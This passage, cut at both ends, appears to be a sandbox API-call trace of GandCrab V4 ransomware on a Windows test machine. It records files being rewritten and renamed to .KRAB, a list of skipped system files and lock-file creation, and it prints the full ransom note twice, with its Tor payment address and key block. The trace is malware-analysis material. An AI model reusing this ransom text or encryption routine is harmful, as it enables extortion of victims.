"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\email insights.xltm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0062.714] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0062.714] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0062.715] ReadFile (in: hFile=0x458, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0xb431d, lpOverlapped=0x0) returned 1 [0062.782] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0xfff4bce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.782] WriteFile (in: hFile=0x458, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xb431d, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0xb431d, lpOverlapped=0x0) returned 1 [0062.783] WriteFile (in: hFile=0x458, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0062.783] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.788] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.791] CloseHandle (hObject=0x458) returned 1 [0062.816] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.816] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\email insights.xltm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\email insights.xltm.krab")) returned 1 [0062.817] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.818] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.818] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.818] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.818] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\KRAB-DECRYPT.txt" [0062.818] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.818] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\KRAB-DECRYPT.txt.KRAB") returned 79 [0062.819] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\KRAB-DECRYPT.txt") returned 74 [0062.819] lstrlenW (lpString=".txt") returned 4 [0062.819] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.819] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.819] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.819] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\KRAB-DECRYPT.txt") returned 74 [0062.819] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\KRAB-DECRYPT.txt") returned 74 [0062.819] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.819] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.819] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.819] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.820] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.820] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.820] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.820] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.820] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.820] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.820] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.820] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.820] lstrcmpW (lpString1="LiveContent", lpString2=".") returned 1 [0062.820] lstrcmpW (lpString1="LiveContent", lpString2="..") returned 1 [0062.820] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="LiveContent" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0062.820] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\" [0062.820] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.821] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.821] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.821] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.821] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.821] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.821] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.821] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\\\KRAB-DECRYPT.txt") returned 87 [0062.821] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0062.827] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.827] WriteFile (in: hFile=0x458, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.828] CloseHandle (hObject=0x458) returned 1 [0062.828] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.828] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.829] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0xa, wMilliseconds=0x18)) [0062.829] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.829] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.829] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.829] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a08d2ca4dee3d.lock") returned 93 [0062.829] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x420 [0062.835] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.835] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.836] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\") returned 70 [0062.836] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*" [0062.836] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd5a0 [0062.836] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.836] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0062.836] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.836] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.836] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0062.836] lstrcmpW (lpString1="16", lpString2=".") returned 1 [0062.836] lstrcmpW (lpString1="16", lpString2="..") returned 1 [0062.836] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2="16" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0062.836] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\" [0062.836] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.837] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.837] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.837] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.837] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.837] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.837] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.838] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\\\KRAB-DECRYPT.txt") returned 90 [0062.838] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0062.838] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.838] WriteFile (in: hFile=0x45c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.839] CloseHandle (hObject=0x45c) returned 1 [0062.839] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.840] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.840] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0xa, wMilliseconds=0x28)) [0062.840] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.840] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.840] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, 